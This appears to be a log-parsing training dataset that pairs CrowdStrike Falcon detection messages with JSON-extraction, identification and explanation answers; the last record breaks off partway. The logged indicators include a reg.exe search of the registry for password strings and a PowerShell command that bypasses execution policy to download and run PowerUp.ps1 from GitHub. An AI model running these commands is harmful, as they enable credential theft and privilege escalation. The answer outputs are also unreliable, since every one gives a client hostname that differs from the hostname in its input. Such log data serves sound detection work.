input_text
stringlengths
52
64.8k
output_text
stringlengths
23
66k
instruction
stringclasses
3 values
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\system32\\reg.exe\" QUERY HKLM /F password /t REG_SZ /S /K","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asacmeiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675347806954","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=28.28.91.62 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf", "filename": "reg.exe", "filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"9162\",\"behavior_id\":\"10250\",\"filename\":\"reg.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\system32\\\\reg.exe\\\" QUERY HKLM /F password /t REG_SZ /S /K\",\"scenario\":\"suspicious_activity\",\"objective\":\"Explore\",\"tactic\":\"Discovery\",\"tactic_id\":\"TA0007\",\"technique\":\"System Network Configuration Discovery\",\"technique_id\":\"T1016\",\"display_name\":\"ReconCommands2\",\"description\":\"A process tree contains characteristics often asacmeiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"ioc_source\":\"library_load\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"user_name\":\"johndoe\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675347806954\",\"sha256\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"md5\":\"8a93acac33151793f8d52000071c0b06\",\"parent_details\":{\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\"},\"pattern_disposition\":2048,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_macmeine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":true,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=28.28.91.62 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-29T16:44:43Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "28.28.91.62", "userName": "johndoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\system32\\reg.exe\" QUERY HKLM /F password /t REG_SZ /S /K","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asacmeiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675347806954","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=28.28.91.62 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\system32\\reg.exe\" QUERY HKLM /F password /t REG_SZ /S /K","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asacmeiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675347806954","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=28.28.91.62 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: 19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf filename: reg.exe filepath: \Device\HarddiskVolume1\Windows\System32\reg.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-29T16:44:43Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 28.28.91.62 userName: johndoe
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=167.150.220.102 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "N/A", "filename": "powershell.exe", "filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"4712\",\"behavior_id\":\"10166\",\"filename\":\"powershell.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"scenario\":\"attacker_methodology\",\"objective\":\"Follow Through\",\"tactic\":\"Execution\",\"tactic_id\":\"TA0002\",\"technique\":\"PowerShell\",\"technique_id\":\"T1059.001\",\"display_name\":\"PShellDownloadRun\",\"description\":\"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"command_line\",\"ioc_value\":\"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks\",\"ioc_source\":\"interactive_script\",\"ioc_description\":\"\",\"user_name\":\"alice\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\",\"sha256\":\"N/A\",\"md5\":\"N/A\",\"parent_details\":{\"parent_sha256\":\"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c\",\"parent_md5\":\"c6cd12bf63e9b9b4478e6f975e7c293d\",\"parent_cmdline\":\"C:\\\\Windows\\\\Explorer.EXE\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=167.150.220.102 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-29T16:44:43Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "167.150.220.102", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=167.150.220.102 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=167.150.220.102 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: N/A filename: powershell.exe filepath: \Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-29T16:44:43Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 167.150.220.102 userName: alice
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"fish","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=132.101.113.134 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "N/A", "filename": "powershell.exe", "filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"4712\",\"behavior_id\":\"10166\",\"filename\":\"powershell.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"scenario\":\"attacker_methodology\",\"objective\":\"Follow Through\",\"tactic\":\"Execution\",\"tactic_id\":\"TA0002\",\"technique\":\"PowerShell\",\"technique_id\":\"T1059.001\",\"display_name\":\"PShellDownloadRun\",\"description\":\"A PowerShell process downloaded and launched a 